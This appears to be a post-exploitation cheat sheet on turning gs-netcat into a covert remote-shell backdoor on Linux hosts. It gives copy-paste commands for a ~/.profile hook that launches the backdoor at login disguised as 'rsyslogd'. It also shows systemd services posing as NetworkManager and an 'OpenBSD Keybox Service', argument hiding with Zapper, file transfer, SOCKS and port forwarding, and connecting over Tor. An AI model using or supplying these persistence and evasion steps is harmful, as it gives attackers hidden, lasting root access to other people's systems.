The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.
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$(GSOCKET_ARGS="-s MySecret -liqD" HOME=/root TERM=xterm-256color SHELL="/bin/bash" /bin/bash -c "cd $HOME; exec -a rsyslogd /path/to/gs-netcat")
gs-netcat -i -s MySecret
- Above will spawn a full pty giving you the option to tab complete and use up arrow as long as CTRL+C
The following line in the user's ~/.profile starts the backdoor (once) when the user logs in. All in one line:
The '( )' brackets start a sub-shell which is then replaced (by exec) with the gs-netcat process. The process is hidden (as rsyslogd) from the process list.
killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS="-s MySecret -liqD" SHELL=/bin/bash exec -a rsyslogd /path/to/gs-netcat)
- Ensure there are no syntax errors or the next time a user logs in they will see this message
ssh [email protected]
[email protected]'s password:
Last login: Mon Dec 30 19:29:55 2024 from
-bash: /root/.profile: line 11: syntax error: unexpected end of file
- when you are connected to the backdoor this is how your process will look
1 S root 442 1 0 80 0 - 794 do_wai 19:43 ? 00:00:00 rsyslogd
1 S root 443 442 0 80 0 - 829 do_sel 19:43 ? 00:00:00 \_ rsyslogd
0 S root 528 443 0 80 0 - 2105 do_sel 19:47 pts/4 00:00:00 \_ -bash
- above will occur no matter how you connect to the server
gs-netcat -s MySecret
gs-netcat -s -i MySecret
Persisting the Server systemd (Not Hidden)
- create secret file
gs-netcat -g >/etc/systemd/gs-root-shell-key.txt
chmod 600 /etc/systemd/gs-root-shell-key.txt
cat /etc/systemd/gs-root-shell-key.txt
- create service file
create /etc/systemd/system/NetworkManage.service
Description=Network Manager
Documentation=man:NetworkManager(8) dbus.service
ExecStart=/opt/gs-netcat -k /etc/systemd/gs-root-shell-key.txt -il
# ensure it does not exist first
ls -lartF /etc/systemd/system/NetworkManage.service
# create the file
echo "[Unit]" >> /etc/systemd/system/NetworkManage.service
echo "Description=Network Manager" >> /etc/systemd/system/NetworkManage.service
echo "Documentation=man:NetworkManager(8)" >> /etc/systemd/system/NetworkManage.service
echo "" >> /etc/systemd/system/NetworkManage.service
echo " dbus.service" >> /etc/systemd/system/NetworkManage.service
echo "" >> /etc/systemd/system/NetworkManage.service
echo "" >> /etc/systemd/system/NetworkManage.service
echo "[Service]" >> /etc/systemd/system/NetworkManage.service
echo "Type=simple" >> /etc/systemd/system/NetworkManage.service
echo "Restart=always" >> /etc/systemd/system/NetworkManage.service
echo "RestartSec=10" >> /etc/systemd/system/NetworkManage.service
echo "WorkingDirectory=/" >> /etc/systemd/system/NetworkManage.service
echo "ExecStart=/opt/gs-netcat -k /etc/systemd/gs-root-shell-key.txt -il" >> /etc/systemd/system/NetworkManage.service
echo "" >> /etc/systemd/system/NetworkManage.service
echo "[Install]" >> /etc/systemd/system/NetworkManage.service
echo "" >> /etc/systemd/system/NetworkManage.service
cat /etc/systemd/system/NetworkManage.service
- after created
systemctl start NetworkManage.service
systemctl enable NetworkManage.service
systemctl status NetworkManage.service
- this is not great because the secret file path or the secret with -s will show up as *********** in the process list
- Zapper is a great tool to hide your cmdline options
- pull the tool from
- example service file, zapper is keybox and gs-netcat is crond in the below example
- make sure it doesnt exist first
ls -lartF /etc/systemd/system/keybox.service
Description=OpenBSD Keybox Service
Documentation=man:keybox(8) man:keybox_config(2) auditd.service
ExecStart=/usr/libexec/keybox -f -a '[cpuhp/0]' -n0 /sbin/crond -liqD -s abc123 &
- quick paste
echo "[Unit]" >> /etc/systemd/system/keybox.service
echo "Description=OpenBSD Keybox Service" >> /etc/systemd/system/keybox.service
echo "Documentation=man:keybox(8) man:keybox_config(2)" >> /etc/systemd/system/keybox.service
echo " auditd.service" >> /etc/systemd/system/keybox.service
echo "" >> /etc/systemd/system/keybox.service
echo "[Service]" >> /etc/systemd/system/keybox.service
echo "Type=oneshot" >> /etc/systemd/system/keybox.service
echo "ExecStart=/usr/libexec/keybox -f -a '[cpuhp/0]' -n0 /sbin/crond -liqD -s abc123 &" >> /etc/systemd/system/keybox.service
echo "KillMode=process" >> /etc/systemd/system/keybox.service
echo "Restart=on-failure" >> /etc/systemd/system/keybox.service
echo "RestartPreventExitStatus=255" >> /etc/systemd/system/keybox.service
echo "" >> /etc/systemd/system/keybox.service
echo "[Install]" >> /etc/systemd/system/keybox.service
echo "" >> /etc/systemd/system/keybox.service
echo "Alias=keybox.service" >> /etc/systemd/system/keybox.service
- after creating the service file (make sure to alter the key
systemctl start keybox.service
systemctl enable keybox.service
systemctl status keybox.service
- If you connect to a listening gs-netcat server with the below options you will have access to the command console
gs-netcat -i -s MySecret
- access it with CTRL+E c, you will see the below
- this nicely provides a way to upload and download files as well as local commands just like in metasploit i.e. lls lcd
gs-netcat -s MySecret -l -S
Client to listen on TCP port 1080 and forward any new connection to the server's SOCKS server:
gs-netcat -s MySecret -p 1080
gs-netcat -s MySecret -l -d -p 22
Client to listen on TCP port 2222 and forward any new connection to the the server. The server then forwards the connection to
gs-netcat -s MySecret -p 2222
ssh -p 2222 [email protected]
The same using 1 command:
ssh -o ProxyCommand='gs-netcat -s MySecret' root@ignored
- For the best security you should always connect to the server via tor
- Start tor in one window
gs-netcat -i -s MySecret -T